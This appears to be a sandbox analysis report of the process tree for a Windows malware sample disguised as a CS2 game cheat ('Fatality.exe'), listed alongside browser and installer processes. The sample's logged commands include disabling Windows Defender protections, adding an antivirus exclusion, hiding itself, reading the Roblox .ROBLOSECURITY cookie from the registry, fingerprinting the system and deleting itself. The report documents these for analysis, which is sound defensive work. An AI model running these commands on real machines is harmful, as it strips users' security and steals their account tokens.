    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
    3⤵
    PID:5160
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
    3⤵
    PID:6092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
    3⤵
    PID:5772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:1
    3⤵
    PID:3768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
    3⤵
    PID:2216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1
    3⤵
    PID:1740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7564 /prefetch:1
    3⤵
    PID:1828
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
    3⤵
    PID:4584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7276 /prefetch:1
    3⤵
    PID:2648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
    3⤵
    PID:3172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
    3⤵
    PID:5144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
    3⤵
    PID:2248
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
    3⤵
    PID:4960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
    3⤵
    PID:4672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
    3⤵
    PID:4780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
    3⤵
    PID:3096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
    3⤵
    PID:3376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
    3⤵
    PID:3268
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7972 /prefetch:1
    3⤵
    PID:1988
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8016 /prefetch:1
    3⤵
    PID:1020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:1
    3⤵
    PID:1196
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8420 /prefetch:8
    3⤵
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:4692
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:1
    3⤵
    PID:5436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:1
    3⤵
    PID:1248
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8268 /prefetch:1
    3⤵
    PID:1592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8540 /prefetch:1
    3⤵
    PID:6080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8008 /prefetch:1
    3⤵
    PID:4116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=8496 /prefetch:8
    3⤵
    PID:3280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=8596 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:4880
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8212 /prefetch:1
    3⤵
    PID:3376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5124 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4908
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1
    3⤵
    PID:5552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
    3⤵
    PID:924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8224 /prefetch:1
    3⤵
    PID:3676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8904 /prefetch:1
    3⤵
    PID:3968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1716 /prefetch:1
    3⤵
    PID:3064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8452 /prefetch:1
    3⤵
    PID:5164
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8980 /prefetch:1
    3⤵
    PID:2844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
    3⤵
    PID:5540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9056 /prefetch:1
    3⤵
    PID:2028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
    3⤵
    PID:3192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9148 /prefetch:1
    3⤵
    PID:1484
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8736 /prefetch:1
    3⤵
    PID:6056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9120 /prefetch:8
    3⤵
    PID:2772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8656 /prefetch:8
    3⤵
    - Subvert Trust Controls: Mark-of-the-Web Bypass
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:2372
- - C:\Users\Admin\Downloads\uninstalltool_setup.exe
    "C:\Users\Admin\Downloads\uninstalltool_setup.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4320
  - - C:\Users\Admin\AppData\Local\Temp\is-H7JHO.tmp\uninstalltool_setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-H7JHO.tmp\uninstalltool_setup.tmp" /SL5="$50394,4977297,845824,C:\Users\Admin\Downloads\uninstalltool_setup.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      PID:3752
    - - C:\Windows\system32\regsvr32.exe
        
        "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Uninstall Tool\UTShellExt.dll"
        5⤵
        Loads dropped DLL
        Modifies system executable filetype association
        Modifies registry class
        
        PID:5548
    - - C:\Windows\system32\regsvr32.exe
        
        "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Uninstall Tool\UTShellExt_x86.dll"
        5⤵
        
        PID:4936
      - C:\Windows\SysWOW64\regsvr32.exe
        
        /s "C:\Program Files\Uninstall Tool\UTShellExt_x86.dll"
        6⤵
        Loads dropped DLL
        Modifies system executable filetype association
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1572
    - - C:\Program Files\Uninstall Tool\PinToTaskbar.exe
        
        "C:\Program Files\Uninstall Tool\PinToTaskbar.exe" /pin UninstallTool.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5892
    - - C:\Program Files\Uninstall Tool\UninstallTool.exe
        
        "C:\Program Files\Uninstall Tool\UninstallTool.exe" /install_service_silent
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5196
    - - C:\Program Files\Uninstall Tool\UninstallTool.exe
        
        "C:\Program Files\Uninstall Tool\UninstallTool.exe" /init
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2020
    - - C:\Program Files\Uninstall Tool\UninstallTool.exe
        
        "C:\Program Files\Uninstall Tool\UninstallTool.exe" /add_control_panel_icon
        5⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:2904
    - - C:\Program Files\Uninstall Tool\UninstallTool.exe
        
        "C:\Program Files\Uninstall Tool\UninstallTool.exe" /skip_uac
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5224
    - - C:\Program Files\Uninstall Tool\UninstallTool.exe
        
        "C:\Program Files\Uninstall Tool\UninstallTool.exe" /msix_register
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2356
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle hidden -c "Add-AppxPackage 'C:\Program Files\Uninstall Tool\UTShellExt2.msix' -ExternalLocation 'C:\Program Files\Uninstall Tool\'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1248
    - - C:\Program Files\Uninstall Tool\UninstallTool.exe
        
        "C:\Program Files\Uninstall Tool\UninstallTool.exe"
        5⤵
        Executes dropped EXE
        Modifies Internet Explorer settings
        Modifies registry class
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:5888
      - C:\Program Files\Uninstall Tool\UninstallToolHelper.exe
        
        "C:\Program Files\Uninstall Tool\UninstallToolHelper.exe" /pid:5888
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4948
- C:\Users\Admin\Desktop\joscki cheat na cs2\Fatality.exe
  "C:\Users\Admin\Desktop\joscki cheat na cs2\Fatality.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1204
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2356
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Desktop\joscki cheat na cs2\Fatality.exe"
    3⤵
    - Views/modifies file attributes
    PID:2512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\joscki cheat na cs2\Fatality.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3788
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:4612
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1960
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3132
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2908
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\joscki cheat na cs2\Fatality.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4640
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:4684
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd904ccc40,0x7ffd904ccc4c,0x7ffd904ccc58
    3⤵
    PID:4332
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1804 /prefetch:2
    3⤵
    PID:3748
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2056,i,8634180619132134656,5286107569553629055,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2120 /prefetch:3
    3⤵
    PID:3760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
